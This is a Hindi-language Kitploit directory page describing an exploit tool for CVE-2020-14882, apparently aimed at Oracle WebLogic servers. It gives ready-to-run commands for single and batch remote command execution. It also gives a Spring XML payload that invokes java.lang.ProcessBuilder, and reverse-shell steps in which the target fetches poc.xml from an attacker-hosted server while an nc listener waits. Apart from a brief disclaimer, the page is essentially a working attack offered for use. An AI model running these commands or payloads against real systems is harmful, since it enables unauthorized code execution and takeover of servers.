Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-14882_ALL — CVE-2020-14882_ALL व्यापक शोषण उपकरण, जो कमांड इको डिटेक्शन, बैच कमांड इको, बाहरी xml बिना-इको कमांड निष्पादन आदि कार्यों का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/ggyao/cve-2020-14882_all
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubggyao/cve-2020-14882_all

CVE-2020-14882_ALL

CVE-2020-14882_ALL व्यापक शोषण उपकरण, जो कमांड इको डिटेक्शन, बैच कमांड इको, बाहरी xml बिना-इको कमांड निष्पादन आदि कार्यों का समर्थन करता है।

रिपॉजिटरी देखें
1443864 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-14882_ALL

CVE-2020-14882_ALL एक व्यापक शोषण उपकरण है, जो कमांड इको डिटेक्शन, बैच कमांड इको, बाहरी xml बिना-इको कमांड निष्पादन आदि कार्यों का समर्थन करता है।

आवश्यक मॉड्यूल: requests, http.client

(यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, कृपया इसे अवैध उपयोग के लिए न करें, उल्लंघन के लिए लेखक ज़िम्मेदार नहीं है।)

कमांड इको मॉड्यूल के ज्ञात सफल संस्करण: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

विकल्प

फ़ंक्शन 1: कमांड इको

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

फ़ंक्शन 2: बैच कमांड इको

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"

target.txt प्रारूप: http://x.x.x.x:xx, प्रत्येक पंक्ति में एक।

फ़ंक्शन 3: बाहरी xml फ़ाइल से बिना-इको कमांड निष्पादन

  1. उदाहरण के लिए Linux रिवर्स शेल, poc.xml फ़ाइल संपादित करें, python लिसनिंग शुरू करें।
root@kitploit:~
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>cmd</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

python लिसनिंग शुरू करें।

nc लिसनिंग शुरू करें।

  1. xml फ़ाइल पथ निर्दिष्ट करने के लिए -x विकल्प का उपयोग करें और payload भेजें।

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

  1. shell सफलतापूर्वक प्राप्त करें।

टूल डाउनलोड करें